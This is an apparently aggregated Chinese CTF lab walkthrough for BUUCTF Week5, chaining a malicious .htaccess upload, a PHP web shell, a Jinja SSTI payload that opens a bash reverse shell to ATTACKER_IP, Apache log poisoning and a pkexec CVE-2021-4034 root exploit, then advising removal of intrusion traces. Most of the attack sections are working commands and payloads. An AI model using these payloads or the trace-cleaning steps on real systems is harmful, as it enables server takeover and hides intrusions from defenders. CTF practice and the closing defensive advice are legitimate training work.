当前位置：首页 > article >正文

新手也能看懂的CTF靶场通关笔记：从.htaccess上传到SUID提权，手把手复现BUUCTF Week5

article 2026/5/20 11:06:43

新手也能看懂的CTF靶场通关笔记从.htaccess上传到SUID提权手把手复现BUUCTF Week5第一次接触CTF比赛时看到那些复杂的漏洞利用链总有种看天书的感觉。直到自己动手在虚拟机里复现了整个攻击流程才真正理解每个技术细节的奥妙。本文将用最直白的语言带你一步步还原BUUCTF Week5中的经典漏洞链——从看似无害的.htaccess文件上传到最终获取服务器最高权限的SUID提权。我们不会跳过任何理所当然的步骤每个命令都会解释清楚它的作用就像有位经验丰富的队友在你耳边耐心指导。1. 环境准备与基础概念在开始实战前我们需要搭建一个与比赛环境相似的靶场。推荐使用VirtualBox配合Vagrant快速部署Ubuntu 22.04环境这样既能隔离实验环境又方便随时重置系统。以下是基础配置步骤# 安装VirtualBox和Vagrant sudo apt update sudo apt install -y virtualbox vagrant # 创建靶机目录并初始化 mkdir buuctf-week5 cd buuctf-week5 vagrant init ubuntu/jammy64 vagrant up vagrant ssh为什么选择Ubuntu 22.04因为这个LTS版本长期维护且软件包较新能更好复现现代CTF场景。接下来安装必要的服务组件# 安装Apache、PHP和相关组件 sudo apt install -y apache2 php libapache2-mod-php \ php-curl php-gd php-mbstring php-xml php-zip注意实际比赛环境可能使用特定PHP版本若遇到语法差异可尝试切换版本sudo apt install php7.4 sudo a2dismod php8.1 sudo a2enmod php7.4理解几个关键术语将帮助后续操作.htaccessApache服务器的分布式配置文件可覆盖主配置SSTIServer-Side Template Injection服务端模板注入漏洞SUIDSet User ID特殊文件权限允许以所有者身份执行2. .htaccess文件上传漏洞实战比赛中的第一个突破口往往是最容易被忽视的地方。这次的目标网站存在文件上传功能但限制了可上传的文件类型。常规绕过方法失效后.htaccess成了突破口。2.1 制作恶意.htaccess文件创建一个文本文件并写入以下内容FilesMatch shell.jpg SetHandler application/x-httpd-php /FilesMatch这个配置会让Apache将所有名为shell.jpg的文件当作PHP脚本解析。用十六进制编辑器查看文件头可以理解其工作原理xxd -g 1 .htaccess 00000000: 3c 46 69 6c 65 73 4d 61 74 63 68 20 22 73 68 65 FilesMatch she 00000010: 6c 6c 2e 6a 70 67 22 3e 0a 20 20 20 20 53 65 74 ll.jpg. Set 00000020: 48 61 6e 64 6c 65 72 20 61 70 70 6c 69 63 61 74 Handler applicat 00000030: 69 6f 6e 2f 78 2d 68 74 74 70 64 2d 70 68 70 0a ion/x-httpd-php. 00000040: 3c 2f 46 69 6c 65 73 4d 61 74 63 68 3e 0a /FilesMatch.2.2 上传与验证使用Burp Suite拦截上传请求修改Content-Type为text/plain。上传成功后再上传一个包含PHP代码的jpg文件?php system($_GET[cmd]); ?访问这个jpg文件时添加URL参数?cmdid如果返回当前用户信息说明漏洞利用成功。常见问题排查问题现象可能原因解决方案500内部错误Apache配置限制检查AllowOverride设置文件被删除安全防护扫描尝试使用.htpasswd等变体无执行效果文件路径错误确认上传目录有执行权限3. SSTI十六进制绕过技巧获得初步立足点后我们在网站搜索功能发现了疑似模板注入点。但常规测试字符被过滤这时需要十六进制编码绕过。3.1 识别SSTI漏洞先测试基础注入语法原始输入被过滤{{7*7}} → 返回49 → 存在SSTI但直接使用{{config}}等敏感操作会被拦截。通过十六进制编码可以绕过# 将payload转换为十六进制 {{config}}.encode(hex) # 得到7b7b636f6e6669677d7d在注入点输入\x7b\x7b\x63\x6f\x6e\x66\x69\x67\x7d\x7d3.2 利用SSTI获取Shell成功绕过过滤后构造反向Shell连接{% for x in ().__class__.__base__.__subclasses__() %} {% if Popen in x.__name__ %} {{ x([/bin/bash,-c,bash -i /dev/tcp/ATTACKER_IP/4444 01],stdout-1).communicate() }} {% endif %} {% endfor %}将上述代码转换为十六进制后分段注入。在攻击机监听nc -lvnp 4444提示如果网络限制导致反向Shell失败可尝试用Python创建简易HTTP服务器传输文件python3 -m http.server 80004. 权限提升从www-data到root拿到普通用户权限后我们开始寻找提权路径。首先收集系统信息# 查看内核版本 uname -a # 查找SUID文件 find / -perm -4000 -type f 2/dev/null # 检查可写目录 find / -writable 2/dev/null | grep -v proc4.1 利用Apache日志污染当常规SUID提权路径被封堵时可以尝试通过污染Apache日志执行代码# 定位日志路径 ps aux | grep apache cat /etc/apache2/envvars | grep LOG # 在User-Agent中注入PHP代码 curl -A ?php system(id); ? http://localhost # 包含日志文件执行 php -r include(/var/log/apache2/access.log);4.2 最终SUID提权发现系统安装了较旧版本的pkexec存在已知漏洞# 下载漏洞利用代码 wget http://example.com/CVE-2021-4034.c -O /tmp/pwn.c gcc /tmp/pwn.c -o /tmp/pwn # 执行提权 /tmp/pwn whoami # 现在应该是root如果编译环境缺失可以尝试预编译的二进制文件。以下是常见SUID提权目标对比程序名称利用难度影响范围修复方案pkexec低Polkit 0.105更新到最新版passwd中配置错误修正权限mount高特定文件系统禁用SUID5. 痕迹清理与防御建议完成挑战后别忘了清理入侵痕迹。删除创建的.htaccess文件、Web Shell和日志中的敏感条目。对于防御方建议禁用不必要的.htaccess覆盖功能对上传文件进行内容检测而非仅依赖扩展名定期更新系统组件修补已知漏洞使用最小权限原则运行服务最后分享一个实用技巧在虚拟机中为每个实验创建快照这样可以在不同阶段自由回溯而不用每次都从头搭建环境。

新手也能看懂的CTF靶场通关笔记：从.htaccess上传到SUID提权，手把手复现BUUCTF Week5

相关文章：

新手也能看懂的CTF靶场通关笔记：从.htaccess上传到SUID提权，手把手复现BUUCTF Week5

WebSocket 库存实时监控实战（Java 服务端 + 前端）

别再问客服了！手把手教你用VNC在AutoDL GPU服务器上跑起你的第一个GUI程序

C++学习笔记17：析构函数

不止于解题：聊聊猪圈密码、圣堂武士密码和标准银河字母背后的历史与趣闻

RimWorld模组管理终极指南：3步掌握RimSort智能排序，告别游戏崩溃烦恼

AI Agent到底是什么

告别手动填表！用Python脚本5分钟搞定DSSAT模型批量模拟（附源码）

集成测试实战

从“让大模型回答问题“到智能决策：LangGraph 构建 AI Agent 的核心奥秘

Android Studio中文界面汉化教程：3步实现母语开发环境

在Hermes Agent中自定义Provider接入Taotoken服务

工业控制新方案：电容HMI与字符LCD组合应用实战

Flowframes：AI视频插帧工具让你的视频流畅度翻倍

基于ARM核心板的T-BOX系统设计：从硬件选型到软件实现

2026 论文双检突围：9 款查重降重降 AIGC 工具硬核横评，Paperxie 领跑全场景通关

手把手教你搞定Windows下的NAMD和VMD安装（附最新版下载与注册避坑指南）

怎么将5v电升到12v?

从查重到降 AIGC，2026 年 9 款论文工具横评：Paperxie 领衔，谁才是本科生的 “熬夜救星”？

从老式万用表到精密测量：双积分ADC如何用‘慢’换来‘准’？选型避坑指南

【例题2】The XOR Largest Pair（信息学奥赛一本通- P1472）

3分钟解锁Translumo：Windows平台屏幕实时翻译的终极解决方案

CVAT教程

视觉伺服visual servoing

20+终极Obsidian模板：简单快速构建你的卡片盒笔记系统

Beyond Compare 5密钥生成终极指南：从激活失败到完全使用

告别Unity WebGL的模糊UI：用Vue3重构前端界面，手把手教你实现双向通信

零基础转专业计算机机试，我用这5道题帮你摸清浙工大出题套路（附C++代码）

麒麟KylinOS 2303系统管理员必备：用模板为新用户批量配置统一电源策略

保姆级教程：用STM32F103C8T6和MAX485芯片实现稳定的一主多从RS485通讯（附完整代码）